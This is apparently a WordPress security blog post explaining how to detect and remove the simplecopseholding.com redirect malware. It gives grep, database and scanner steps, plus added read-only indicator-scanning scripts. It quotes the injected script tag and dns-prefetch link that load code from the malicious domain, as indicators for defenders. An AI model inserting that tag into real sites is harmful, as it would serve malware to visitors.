How to Remove Simplecopseholding.com Redirect Malware (WordPress Fix)

Published on 1/8/2026
MD Pabel
If you are reading this, you are likely panicking because your WordPress site—or your client’s site—is suddenly redirecting users to a spammy domain like simplecopseholding.com or getfix.win.

You might have already scanned the site with a security plugin and found nothing, yet the redirect persists.

This particular malware is part of the SocGholish / FakeUpdate family. It is nasty because it doesn’t just “break” your site; it silently injects code that waits for specific visitors (often from search engines) before hijacking their browser.

Here is exactly what simplecopseholding.com is, how to find it in your code (even when it hides), and how to remove it for good.

What is Simplecopseholding.com?

Simplecopseholding.com is a malicious domain used by hackers to deliver payloads to unsuspecting visitors.

When infected, your website loads a script from this domain. This script acts as a traffic controller:

  • It checks the visitor: Is it a real human? Are they on a mobile device?
  • It executes the redirect: If the victim matches the criteria, they are forcibly redirected to scam sites selling fake software, crypto schemes, or illegal products.
  • It hides: If you (the admin) visit the site, the code often stays dormant, making you think everything is fine.

The Smoking Gun: What the Infection Looks Like

Unlike some hacks that delete files, this malware injects itself into your legitimate files. Based on recent cleanups, here is the signature you need to look for.

Open your website’s source code (Right-click > View Page Source) and search for simplecopseholding. You will likely see a dns-prefetch tag or a script tag looking exactly like this:

<script id="hexagoncontrail-js" src="https://simplecopseholding.com/jWcTAonomVveWlRkcUjN6PF-aopGXJy" type="text/javascript"></script>
<link rel='dns-prefetch' href='//simplecopseholding.com' />

(Above: The malicious “hexagoncontrail” script injecting the redirect.)

If you see dns-prefetch href='//simplecopseholding.com', your site is definitely infected.

How to Find & Remove the Malware (3 Methods)

Because this malware obfuscates (hides) itself inside your database or legitimate plugins, standard scans sometimes miss it. Use these methods in order.

Method 1: The “High Sensitivity” Wordfence Scan

If you already have Wordfence installed, it might have missed the infection because the standard scan is designed to be fast, not deep.

  1. Go to Wordfence > All Options.
  2. Scroll to General Options and check “Scan core files against repository versions”.
  3. Check “Scan theme and plugin files against repository versions”.
  4. Set “Scan sensitivity” to High Sensitivity.
  5. Run a new scan.

If Wordfence finds a “Modified Core File” or an unknown file in wp-content/plugins, check the code manually before deleting. If you see the domain simplecopseholding inside, delete the file immediately.

Method 2: The Terminal “Grep” Search (For Developers)

If you have SSH access, this is the fastest way to find the hidden code. The malware often hides in header.php, footer.php, or random .js files.

Run this command inside your public_html folder to search for the domain:

grep -r "simplecopseholding" .

If that returns no results, search for the script ID often associated with this campaign:

grep -r "hexagoncontrail" .
  • Result: The terminal will show you the exact file path (e.g., ./wp-content/themes/astra/header.php) where the hacker injected the line.
  • Fix: Open that file via FTP or File Manager and delete only the malicious line.
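
The two greps above, combined into one report-only sweep. This is an added example, not part of the original article; the function names and the demo tree are constructed for illustration, and the indicators are the ones quoted in this post.

```shell
#!/usr/bin/env bash
# Report-only sweep for the indicators named in this article. Nothing is
# modified: review every hit by hand before deleting a line.

# Domains and injected script id quoted in the article.
INDICATORS='simplecopseholding|getfix\.win|hexagoncontrail'

# scan_indicators DIR
# Prints "path:line:match" for each hit in PHP, JS and HTML files under DIR.
# -I skips binaries, -i ignores case, -o prints only the matched token so a
# minified one-line file does not flood the terminal.
# Exit status: 0 = at least one hit, 1 = no hits.
scan_indicators() {
    grep -rIinoE --include='*.php' --include='*.js' --include='*.html' \
        -e "$INDICATORS" "${1:-.}"
}

# infected_files DIR
# Prints each file with a hit once, sorted, as a cleanup worklist.
infected_files() {
    grep -rIliE --include='*.php' --include='*.js' --include='*.html' \
        -e "$INDICATORS" "${1:-.}" | sort
}

# make_demo_tree DIR
# Builds a small CONSTRUCTED theme tree: one file carrying the injected tag
# shown in the article, one clean file.
make_demo_tree() {
    mkdir -p "$1/wp-content/themes/demo"
    cat > "$1/wp-content/themes/demo/header.php" <<'EOF'
<?php wp_head(); ?>
<script id="hexagoncontrail-js" src="https://simplecopseholding.com/jWcTAonomVveWlRkcUjN6PF-aopGXJy" type="text/javascript"></script>
EOF
    printf '<?php wp_footer(); ?>\n' > "$1/wp-content/themes/demo/footer.php"
}

# Usage on a real site (run from public_html):
#   scan_indicators . || echo "no indicators found"
```

Because the exit status follows grep's, the function can be rerun after cleanup as a quick check that no indicator remains in the tree.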

Method 3: The “Download & Search” Technique (Failsafe)

If you can’t use SSH and the scanner failed:

  1. Connect to your site via FTP (FileZilla).
  2. Download your entire wp-content folder to your computer.
  3. Open the folder in VS Code (a free code editor).
  4. Press Ctrl + Shift + F (Global Search).
  5. Search for simplecopseholding.
  6. VS Code will scan every single file and show you exactly where the virus is hiding.

Checking the Database

Sometimes the malware isn’t in a file at all: it’s injected directly into your database options, in a value that gets printed through the wp_head hook.

  1. Install a plugin like “Better Search Replace” (do not run a replace yet!).
  2. Run a “Search” for simplecopseholding.
  3. If it finds matches in the wp_options table, you will need to edit that row in phpMyAdmin and remove the script tag.
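
If you have a SQL export of the database (for example from phpMyAdmin's Export tab), the same search can be done offline. This is an added example, not part of the original article; it assumes a plain-text `.sql` export, and the function names, the sample dump and the `constructed_header_code` option name are constructed for illustration.

```shell
#!/usr/bin/env bash
# Report which tables in a SQL export contain the article's indicators.
# Read-only: the dump file is only read, never changed.

# table_hits DUMP.sql
# Prints "table<TAB>matching_lines" per table. The current table is taken from
# the most recent INSERT INTO `name` header, so it works for one-row-per-line
# exports and for long multi-row INSERT lines alike.
table_hits() {
    awk '
        match($0, /INSERT INTO `[^`]+`/) {
            # "INSERT INTO `" is 13 characters; drop it and the closing backtick.
            table = substr($0, RSTART + 13, RLENGTH - 14)
        }
        tolower($0) ~ /simplecopseholding|getfix\.win|hexagoncontrail/ {
            hits[table ? table : "(unknown)"]++
        }
        END { for (t in hits) printf "%s\t%d\n", t, hits[t] }
    ' "$1" | sort
}

# make_demo_dump FILE
# Writes a small CONSTRUCTED export: a clean wp_posts row and a wp_options
# row holding the dns-prefetch tag shown in the article.
make_demo_dump() {
    cat > "$1" <<'EOF'
INSERT INTO `wp_posts` (`ID`, `post_title`) VALUES
(1, 'Hello world');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`) VALUES
(1, 'siteurl', 'https://example.test'),
(2, 'constructed_header_code', '<link rel="dns-prefetch" href="//simplecopseholding.com" />');
EOF
}

# Usage:
#   table_hits export.sql
```

A hit outside wp_options (for example in wp_posts) means the tag was also written into content rows, which need the same manual edit.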

Post-Cleanup Checklist

Once the code is gone, you aren’t safe yet. The hacker likely left a “backdoor” to get back in.

  • Change all Admin Passwords: Log everyone out and force a password reset.
  • Update Everything: Old plugins are the #1 entry point for this infection.
  • Check for “Ghost” Admins: Go to your Users tab. Do you see any admins you don’t recognize? (Look for names like adminbackup or wp-support). Delete them.
  • Resubmit to Google: If Google flagged your site as “Dangerous,” go to Search Console and request a review once the clean-up is done.

Need Emergency Help?

Removing simplecopseholding.com redirects can be tricky because if you delete the wrong line of code, you can crash your site. If you’ve tried these steps and the redirect is still happening, or if you want a professional to ensure the backdoor is truly closed, I can help.


FAQs

Why is my site redirecting only on mobile?

This malware is “smart.” It detects the User-Agent of the visitor. It often ignores desktop users and logged-in admins to stay hidden longer, while aggressively redirecting mobile visitors to maximize scam revenue.

Is simplecopseholding.com a virus?

It is a domain used by a virus (specifically the SocGholish malware family). It serves the malicious JavaScript that hijacks your visitors’ browsers.

Will this hurt my SEO?

Yes. Google will eventually blacklist your site, showing a bright red “Deceptive Site Ahead” warning to users. You must remove the malware immediately to preserve your rankings.

About the Author

MD Pabel

MD Pabel is the Founder and CEO of 3Zero Digital, a leading agency specializing in custom web development, WordPress security, and malware removal. With 8+ years of experience, he has completed 3200+ projects, served 2300+ clients, and resolved 4500+ cases of malware and hacked websites.